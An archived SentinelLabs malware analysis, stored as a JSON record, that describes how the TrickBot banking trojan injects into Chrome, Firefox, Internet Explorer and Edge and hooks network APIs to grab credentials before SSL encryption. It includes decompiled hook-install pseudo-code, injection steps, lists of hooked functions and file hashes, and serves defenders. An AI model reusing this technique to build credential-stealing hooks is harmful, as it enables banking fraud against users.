{
	"id": "e3f1d545-0f56-487f-9a3d-9f849c4b14c0",
	"created_at": "2026-04-06T00:19:06.907293Z",
	"updated_at": "2026-04-10T03:22:00.693768Z",
	"deleted_at": null,
	"sha1_hash": "55adb1cf5a5076ce5a1059e117c38c15d7025853",
	"title": "How TrickBot Malware Hooking Engine Targets Windows 10 Browsers - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2656048,
	"plain_text": "How TrickBot Malware Hooking Engine Targets Windows 10\r\nBrowsers - SentinelLabs\r\nBy Vitali Kremez\r\nPublished: 2019-10-24 · Archived: 2026-04-05 21:10:12 UTC\r\nVitali Kremez revealing how TrickBot’s hooking engine targets Chrome, Firefox, Explorer and Edge in Windows\r\n10.\r\nWhat is TrickBot Malware? Background \u0026 Summary\r\nTrickBot banking malware remains one of the more interesting and continually developing malware on the\r\nfinancial crimeware landscape. It employs multiple means and methods to exploit compromised machines of\r\ninterest. The focus of this post is to cover in-depth some of its Windows 10 Microsoft Edge and other browser\r\nhooking engine functionality. We will focus on the internals, and how TrickBot leverages these browsers to set up\r\nhooks for API calls of interest. The ultimate goal of the malware browser hooking is predominantly to intercept\r\nonline banking credentials before they become SSL encrypted. The stolen credentials can subsequently be used for\r\naccount takeover (ATO) fraud.\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 1 of 10\n\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 2 of 10\n\nSince Windows 10 came with a new browser, “Microsoft Edge”, TrickBot operators needed their banking\r\nmalware to operate on that software. To implement form-grabbing and web injections in the Windows 10 Edge\r\nbrowser, TrickBot’s rogue rtlbroker hooks the microsoftedgecp.exe process. Normally, runtimebroker.exe\r\nis the parent process of the Microsoft Edge browser on Windows 10 machines. \r\nTrickBot Browser Process Injection Technique “Reflective Loader”\r\nIn order to hook browser functions, TrickBot malware injects the payload into the browser of choice via the so-called “ReflectiveLoader” methodology. \r\nThe TrickBot process injection function targets four browsers from Microsoft Edge to Google Chrome and one\r\nMicrosoft Edge related process.\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 3 of 10\n\nTrickBot injects the malware targeting the following processes:\r\nchrome.exe\r\niexplore.exe\r\nfirefox.exe\r\nmicrosoftedgecp.exe\r\nruntimebroker.exe\r\nThe malware also “relaxes” browser security and write changes files locally before injection occurs.\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 4 of 10\n\nTrickBot’s reflective injection works as follows:\r\nOpen target process and allocate memory address in remote process via VirtualAllocEx\r\nCopy function WriteProcessMemory into the allocated memory space\r\nCopy shellcode WriteProcessMemory into the allocated memory space\r\nCall FlushInstructionCache API to make sure our changes are written right away\r\nCall inject RemoteThread function call\r\nCall ResumeThread\r\nElse, call undocumented API function RtlCreateUserThread to start execution in the remote process,\r\nusing the offset address of the reflective loader function as the entry point.\r\nTrickBot Malware Hooking Engine\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 5 of 10\n\nWhen the TrickBot banker hooks the API function, it enters the new hooked one and checks to make sure the\r\nprocess is microsoftedgecp.exe while passing control to the original one when the hooked function concludes.\r\nThe basic TrickBot banking API hooking template is as follows:\r\n\"CreateHook_API\" Function Template -\u003e\r\n{ int CreateHook_API(LPCSTR DLL_name, int original_function_name,\r\nint myHook_function, int address_of_original_function) }\r\nBy and large, TrickBot hooking engine works via overwriting the basic API with the redirect functions with the\r\n0xe9 opcode, which is the call for a jump with 32-bit relative offset. TrickBot uses a trampoline function and the\r\nwrite hook call with the VirtualProtectEx API to make sure that the function has the 0x40\r\n(PAGE_EXECUTE_READWRITE) property. Additionally, it attempts to conceal detection of this hooking\r\ntechnique via prepending NOP and/or RETN.\r\nThe exact TrickBot hook pseudo-code is as follows:\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 6 of 10\n\nsigned int __cdecl TrickBot_Hook_Install(int myHook_function, int *function_address)\r\n{\r\nchar *original_function;\r\nchar *current_func_id_thread;\r\nint v5;\r\nchar jump_len;\r\nsigned int result;\r\nSIZE_T v8;\r\nvoid *trampoline_lpvoid;\r\nint v10;\r\nint v11;\r\nunsigned __int8 jmp_32_bit_relative_offset_opcode;\r\nint relative_offset;\r\nDWORD flOldProtect;\r\noriginal_function = func_name;\r\ncurrent_func_id_thread = func_name + 0x24;\r\niter_func(func_name + 0x24, 0x90, 0x23);\r\nif ( function_address )\r\njump_len = walker_byte_0(*(_BYTE **)(original_function + 1), (int)current_func_id_th\r\nelse\r\njump_len = 5;\r\noriginal_function[5] = jump_len;\r\nif ( !jump_len )\r\ngoto LABEL_12;\r\nwrite_hook_iter((int)(original_function + 6), *(_BYTE **)(original_function + 1), (un\r\nif ( function_address )\r\n*function_address = (int)current_func_id_thread;\r\nrelative_offset = myHook_function - *(_DWORD *)(original_function + 1) - 5;\r\nv8 = (unsigned __int8)original_function[5];\r\ntrampoline_lpvoid = *(void **)(original_function + 1);\r\njmp_32_bit_relative_offset_opcode = 0xE9u;\r\nif ( VirtualProtectEx((HANDLE)0xFFFFFFFF, trampoline_lpvoid, v8, 0x40u, \u0026flOldProtect) )\r\n{\r\nv10 = *(_DWORD *)(original_function + 1);\r\nv11 = (unsigned __int8)original_function[5] - (_DWORD)original_function - 0x47;\r\noriginal_function[66] = 0xE9u;\r\n*(_DWORD *)(original_function + 0x43) = v10 + v11;\r\nwrite_hook_iter(v10, \u0026jmp_32_bit_relative_offset_opcode, 5);\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 7 of 10\n\nVirtualProtectEx(\r\n(HANDLE)0xFFFFFFFF,\r\n*(LPVOID *)(original_function + 1),\r\n(unsigned __int8)original_function[5],\r\nflOldProtect,\r\n\u0026flOldProtect);\r\nresult = 1;\r\nFor instance, TrickBot malware sets up its own custom myCreateProcessA function prototype after the hook on\r\nCreateProcessA . The idea is to catch any instance of microsoftedgecp.exe execution to intercept it for\r\nsubsequent injection. This function ultimately returns the flow back to CreateProcessA after intercepting and\r\ncollecting necessary process execution information.\r\nThe following four API calls being hooked are in the child Microsoft Edge via rogue rtlbroker.dll , allowing\r\nTrickBot operators to intercept and manipulate Microsoft Edge calls:\r\nCreateProcess\r\nCreateProcessW\r\nCreateProcessAsUserA\r\nCreateProcessAsUserW\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 8 of 10\n\nTrickBot hooks Internet Explorer and Microsoft Edge in wininet.dll library API calls:\r\nHttpSendRequestA\r\nHttpSendRequestW\r\nHttpSendRequestExA\r\nHttpSendRequestExW\r\nInternetCloseHandle\r\nInternetReadFile\r\nInternetReadFileExA\r\nInternetQueryDataAvailable\r\nHttpQueryInfoA\r\nInternetWriteFile\r\nHttpEndRequestA\r\nHttpEndRequestW\r\nInternetQueryOptionA\r\nInternetQueryOptionW\r\nInternetSetOptionA\r\nInternetSetOptionW\r\nHttpOpenRequestA\r\nHttpOpenRequestW\r\nInternetConnectA\r\nInternetConnectW \r\nThe malware hooks Mozilla Firefox Browser in nspr4.dll library API calls:\r\nPR_OpenTCPSocket\r\nPR_Connect\r\nPR_Close\r\nPR_Write\r\nPR_Read \r\nIt hooks Chrome in chrome.dll library API calls:\r\nssl_read\r\nssl_write\r\nReference\r\ninjectDll32.dll C546D40D411D0F0BB7A1C9986878F231342CDF8B\r\nrtlbrokerDll.dll 0785D0C5600D9C096B75CC4465BE79D456F60594\r\ntestnewinj32Dll.dll D5F98BFF5E33A86B213E05344BD402350FC5F7CD\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 9 of 10\n\nSource: https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/"
	],
	"report_names": [
		"how-trickbot-hooking-engine-targets-windows-10-browsers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434746,
	"ts_updated_at": 1775791320,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55adb1cf5a5076ce5a1059e117c38c15d7025853.pdf",
		"text": "https://archive.orkl.eu/55adb1cf5a5076ce5a1059e117c38c15d7025853.txt",
		"img": "https://archive.orkl.eu/55adb1cf5a5076ce5a1059e117c38c15d7025853.jpg"
	}
}